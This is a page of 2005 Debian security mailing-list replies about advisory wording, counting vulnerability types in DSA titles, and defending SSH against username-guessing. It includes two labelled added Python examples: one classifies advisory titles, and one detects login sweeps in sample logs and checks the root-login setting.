Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 08:05:40PM +0100, David Schmitt wrote:
> On Wednesday 09 March 2005 19:13, Steve Kemp wrote:
> > A simple script I wrote did that for me already - although there are some fixups required as we seem to have a few different spellings for different things. eg. sanitizing vs sanitising. You can see the simple output here along with input and output.
> > http://people.debian.org/~skx/2005/
>
> Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached.

Thanks, I've applied it and updated the page.

Steve
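Neither the script at people.debian.org/~skx/2005/ nor David's diff is reproduced on this page, so the following is an added example of the same idea rather than that code: take DSA subject lines, strip the "New foo packages fix" lead, fold the spelling variants the thread mentions (sanitising/sanitizing, plural overflows), bucket each issue into a vulnerability type, note whether it is described as local, and print the buckets sorted by count. The sample titles are the real DSA subjects quoted elsewhere on this page plus a few constructed ones (package names `examplepkg` and `otherpkg`) that exercise the normalisation; the category list is an assumption.

```python
"""Classify advisory subject lines by vulnerability type, normalising the
spelling variants that skew the counts, and sort the result by count."""
import re
from collections import Counter

# Constructed sample: DSA subjects quoted on this page plus made-up ones
# (examplepkg/otherpkg) that exercise the spelling fix-ups.
SAMPLE_TITLES = [
    "New bzip2 packages prevent decompression bomb",
    "New cvs packages fix arbitrary code execution",
    "New xemacs21 packages fix arbitrary code execution",
    "New hztty packages fix local utmp exploit",
    "New Ruby 1.6 packages fix safety bypass",
    "New examplepkg packages fix insecure temporary file creation",
    "New otherpkg packages fix missing input sanitising",
    "New otherpkg packages fix missing input sanitizing",
    "New examplepkg packages fix buffer overflows",
    "New examplepkg packages fix local buffer overflow",
]

PREFIX = re.compile(r"^new .+? packages? (?:fix(?:es)?|prevent|correct)\s+", re.IGNORECASE)

# Ordered: the first pattern that matches the normalised phrase wins.
CATEGORIES = [
    ("arbitrary code execution", r"arbitrary code"),
    ("buffer overflow", r"\b(buffer|stack|heap) overflow\b"),
    ("input sanitizing", r"sanitiz"),
    ("insecure temporary file", r"temp(?:orary)? ?file|tmp ?file"),
    ("denial of service", r"denial of service|decompression bomb|\bdos\b"),
    ("format string", r"format string"),
    ("bypass", r"bypass"),
]


def normalise(text: str) -> str:
    """Lower-case and fold the spelling variants seen in DSA titles."""
    text = text.lower()
    text = text.replace("sanitis", "sanitiz")          # British/American spelling
    text = re.sub(r"\boverflows\b", "overflow", text)  # plural/singular
    return text.strip()


def issue_phrase(title: str) -> str:
    """Strip the 'New foo packages fix ' lead so only the issue description is left."""
    return normalise(PREFIX.sub("", title.strip()))


def classify(title: str) -> tuple:
    """(category, is_local) for one title; unmatched titles fall into 'other'."""
    phrase = issue_phrase(title)
    is_local = re.search(r"\blocal\b", phrase) is not None
    for name, pattern in CATEGORIES:
        if re.search(pattern, phrase):
            return name, is_local
    return "other", is_local


def summarise(titles: list) -> list:
    """[(category, count)] sorted by count descending, then by name."""
    counts = Counter(classify(t)[0] for t in titles)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for category, count in summarise(SAMPLE_TITLES):
        print(f"{count:3d}  {category}")
    print("local:", sum(classify(t)[1] for t in SAMPLE_TITLES), "of", len(SAMPLE_TITLES))
```

Anything that lands in "other" is the list to read by hand; in a real run it is usually where the next spelling variant or missing category shows up, as "sanitizations" did in David's diff.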
Re: [ph.unimelb.edu.au #1013] AutoReply: [SECURITY] [DSA 675-1] New hztty packages fix local utmp exploit
On Thu, Feb 10, 2005 at 07:59:35PM +0100, Jasper Filon wrote:
> maybe someone should kick him off the list?

And anybody else who manages to quote the entire text of the DSA for no purpose ..?

Steve
Re: [SECURITY] [DSA 671-1] New xemacs21 packages fix arbitrary code execution
On Tue, Feb 08, 2005 at 04:58:36PM +0100, Frank Küster wrote:
> I find the text of this advisory really confusing - the subject and Package line talk about xemacs21, the description about "Emacs, the well-known editor" and "your emacs packages". If it isn't sufficiently confusing to make xemacs users believe that only GNU Emacs is affected, at least it makes GNU Emacs (emacs21) users wonder whether their editor is affected, too.

Both Emacs and XEmacs are affected. Perhaps the wording was a little unfortunate though.

Steve
Re: [Fwd: security]
Could it be this?

http://lists.sans.org/pipermail/intrusions/2004-August/008357.html

You didn't specify which usernames were being used, so it's tough to tell if that's the same.

A couple of simple and quick things that I might do if this was a concern:

- Set up an iptables firewall on the boxen running SSH and only allow certain hosts to get to port 22. Alternately, you might consider denying access through tcpwrappers, though I much prefer the iptables method.

- Make sure that PermitRootLogin is set to no in your /etc/ssh/sshd_config. Some might argue the necessity or effectiveness of this measure but it is another step you can take to help defend the computer.

I'm sure others have appropriate suggestions as well.

Steve

On Sat, Jan 29, 2005 at 03:05:35PM +, michael wrote:
> On debian-user it was suggested I also post this here, thanks, Michael
>
> Forwarded Message
> From: michael [EMAIL PROTECTED]
> To: debian user debian-user@lists.debian.org
> Subject: security
> Date: Fri, 28 Jan 2005 09:46:31 +
>
> I notice that frequently many machines around here get attacked by a potential hacker (a prog I guess) trying lots of usernames to get in to all the machines, using the same set of usernames at the same time. Have people seen this on their machines? I'm guessing it's a virus/worm on a Windows box doing this but does anybody know more?
>
> I've followed most of the suggestions listed in chapters 4 and 5 of the Securing Debian HowTo/Manual, although I will admit to not following and therefore not having got around to firewalling.
>
> Other suggestions most welcome.
>
> Thanks
> --
> Michael Bane
> Atmospheric Physics Group
> University of Manchester
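An added example, not part of the thread, that turns the two suggestions above into checks a defender can run: it flags any source that tries many distinct usernames within a short window (the "lots of usernames at the same time" pattern Michael describes) in sshd log lines, and verifies the PermitRootLogin setting in an sshd_config excerpt. The log lines, hostname and addresses are constructed; the "Illegal user" wording matches the sshd of that era, and the year is assumed since syslog lines carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt: one host cycling through names, one lone failure.
AUTH_LOG = """\
Jan 28 09:46:01 host sshd[1201]: Illegal user test from 192.0.2.10
Jan 28 09:46:02 host sshd[1203]: Illegal user guest from 192.0.2.10
Jan 28 09:46:04 host sshd[1207]: Failed password for root from 192.0.2.10 port 4001 ssh2
Jan 28 09:46:05 host sshd[1209]: Illegal user user from 192.0.2.10
Jan 28 09:50:00 host sshd[1300]: Failed password for michael from 198.51.100.7 port 4010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Illegal user (?P<bad>\S+)|Failed password for (?:invalid user )?(?P<user>\S+))"
    r" from (?P<src>[\d.]+)")

def parse(log, year=2005):
    """Yield (timestamp, source, username) for each failed-login line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["bad"] or m["user"]

def find_sweeps(log, min_users=4, window_s=60):
    """Map source -> sorted usernames for sources that tried at least
    min_users distinct names within window_s seconds."""
    by_src = defaultdict(list)
    for ts, src, user in parse(log):
        by_src[src].append((ts, user))
    sweeps = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            names = {u for t, u in events[i:] if (t - start).total_seconds() <= window_s}
            if len(names) >= min_users:
                sweeps[src] = sorted(names)
                break
    return sweeps

def root_login_permitted(sshd_config):
    """True unless PermitRootLogin is 'no'. sshd honours the first occurrence,
    and the option defaulted to 'yes' in OpenSSH of that era."""
    for line in sshd_config.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) > 1 and fields[0].lower() == "permitrootlogin":
            return fields[1].lower() != "no"
    return True
```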
Re: DSA policy change? (posting stopped to full-disclosure ML)
On Thu, Jan 27, 2005 at 11:53:45AM +0900, Seiji Kaneko wrote:
> The security team had posted DSAs to the full-disclosure mailing list as well as the Debian security announce ML, but seems to have stopped posting since last December. Is there any policy change?

I'm not sure about the full-disclosure list, but the DSAs are still being announced to the Debian-security-announce list, as you can see from the online archive:

http://lists.debian.org/debian-security-announce/debian-security-announce-2005/threads.html

Perhaps you have a problem with your subscription / mailer / filtering?

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit